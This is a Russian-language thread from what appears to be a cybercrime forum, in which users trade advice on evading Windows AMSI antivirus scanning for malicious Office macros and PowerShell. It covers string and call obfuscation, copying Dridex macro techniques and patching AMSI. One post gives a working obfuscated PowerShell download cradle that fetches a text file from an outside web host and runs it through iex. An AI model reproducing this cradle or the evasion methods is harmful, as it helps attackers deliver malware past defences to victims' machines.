• XSS.stack #1 – первый литературный журнал от юзеров форума

Обход AMSI

chyond

floppy-диск
Пользователь
Реакции
0
Всем привет! Пытаюсь работать с макросами, возникли проблемы с amsi на этапе работы с com обьектами. Естественно понимаю, что рабочие решения по обходу, отключению являются приватными и никто не захочет просто так ими делиться, но может кто то намекнет в какую сторону копать! Спасибо!

Да спасибо! Эту статью естественно видел, и смотрел. Но как я понял, что бы сделать что то подобное то нужно погонять процесс word.exe в WinDBG, и найти какаю то свою функцию, от которой искать смещение AmsiScanBuffer. Особо не работал с WinDBG, но готов поизучать данное направление. Хотелось бы узнать перспективно ли это? Еще читал, что некоторые решения обходят, а не отключают amsi, как в данной статье. Может есть мысли куда копать?

Пожалуйста, обратите внимание, что пользователь заблокирован
Хотелось бы узнать перспективно ли это?
Ну если сделаешь так, что сам обход не запалится, то перспективно.

Еще читал, что некоторые решения обходят, а не отключают amsi, как в данной статье.
AMSI в общем случае - сигнатурная проверка, ее можно обойти за счет обфускации автоматической или ручной.

AMSI в общем случае - сигнатурная проверка, ее можно обойти за счет обфускации автоматической или ручной.
Да, я понимаю, но как можно обфусцировать VBA код, если AMSI логирует вызовы WinAPI и COM? На сколько я понимаю, как не меняй названия функций и переменных, вызов API останеться прежним!? Или я что то не правильно понимаю? Спасибо!

Да, я понимаю, но как можно обфусцировать VBA код, если AMSI логирует вызовы WinAPI и COM? На сколько я понимаю, как не меняй названия функций и переменных, вызов API останеться прежним!? Или я что то не правильно понимаю? Спасибо!
Еще раз AMSI - сигнатурный детект, она не ничего не логирует.

Понял, то есть необходима обфускация кода vba?
Ну очевидно так.

Я это к тому, что я пробовал менять названия переменных, функций, добавлять мусорный код. Результат тот же, amsi срабатывает, по этому и решил сюда написать. Возможно я не правильно понимаю обфускацию в данном контексте?

Я это к тому, что я пробовал менять названия переменных, функций, добавлять мусорный код. Результат тот же, amsi срабатывает, по этому и решил сюда написать. Возможно я не правильно понимаю обфускацию в данном контексте?
Ну покажи, что ты и как менял. Ну и опять же AMSI это интерфейс для скриптовых языков к антивирусу. По интерфейсу передается строка и возвращается, нашлась там сигнатура или нет. Если антивирус ставит свой провайдер (как Касперский например), то в теории с этой строкой может происходить все, что угодно, вплоть до деобфускации и эмуляции VBA, или отправки этой строки в облако. Но по-умолчанию AMSI - чисто сигнатурная вещь.

Вызовы объектов тоже надо обфусцировать.И тем более когда у тебя идёт Shell.Run. А как ты это делать будешь,уже вопрос гораздо сложнее. Но ты можешь взять макросы от dridex на малварьбазаре например и глянуть алгоритм обфускации.

Вызовы объектов тоже надо обфусцировать.И тем более когда у тебя идёт Shell.Run. А как ты это делать будешь,уже вопрос гораздо сложнее.
Оффтоп, но как обфуцировать вызовы в скриптовых языках?

Например интересует пш обфускация вызовов. Простой сет алиаса поможет ли с этим? Есть кто шарит?

Ну покажи, что ты и как менял.
Строки предсталял как склейку символов, символы представляю как Chr() от чисел, меняю названия переменных, меняю порядок вызовов функций, где возможно. Добавляю мусорный код(арифметические операции).

Строки предсталял как склейку символов, символы представляю как Chr() от чисел, меняю названия переменных, меняю порядок вызовов функций, где возможно. Добавляю мусорный код(арифметические операции).
ну вот покажи семпл - чистый код -> пару семплов обфуцированного кода твоим обфускатором. Ибо то, что ты перечислил должен обходить амси. Или все тобой написано пезжо

Например интересует пш обфускация вызовов.
Reflection

Оффтоп, но как обфуцировать вызовы в скриптовых языках?

Например интересует пш обфускация вызовов. Простой сет алиаса поможет ли с этим? Есть кто шарит?
в пш,как пример, воспользуйся функией реплейс

Код:
[string]$a={(New-Object Net.WebClient).Doyeksleisling('http://quarez.atwebpages.com/ds/le.txt')};$b=$a.replace('yeksleisl','wnloadStr');$c=iex $b;iex $c

в пш,как пример, воспользуйся функией реплейс

Код:
[string]$a={(New-Object Net.WebClient).Doyeksleisling('http://quarez.atwebpages.com/ds/le.txt')};$b=$a.replace('yeksleisl','wnloadStr');$c=iex $b;iex $c
Насколько это эффективно будет? Я имел ввиду обфускация самих вызовов в контексте приложения, чтоб просто по call map палево не прилетело, а не обфускация строк вызовов на то, что могут сигнатурный детект поставить.

пропачить амси можно, на пш рабоатает на ура.
Всем привет! Пытаюсь работать с макросами, возникли проблемы с amsi на этапе работы с com обьектами. Естественно понимаю, что рабочие решения по обходу, отключению являются приватными и никто не захочет просто так ими делиться, но может кто то намекнет в какую сторону копать! Спасибо!

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх